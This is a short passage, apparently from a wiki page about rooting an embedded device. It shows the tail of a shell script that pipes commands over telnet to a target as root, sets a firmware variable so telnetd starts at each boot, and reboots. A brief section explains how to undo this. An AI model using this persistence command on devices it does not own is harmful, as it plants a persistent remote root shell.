PERSISTENCE="(sleep 5; echo \"root\"; sleep 5 ; echo \"fw_setenv EXTRA_CMD \\\"telnetd &\\\"; reboot\" ; sleep 5;) | ./busybox telnet $TARGET 23"<br />
su -c "$PERSISTENCE"<br />
echo "[+] done"<br />
echo "[+] you can now telnet to port 23"<br />
fi<br />
</pre><br />
<br />
==Removing Root==<br />
<br />
run <b>/cavium/fw_setenv EXTRA_CMD; reboot</b></div>
0x00string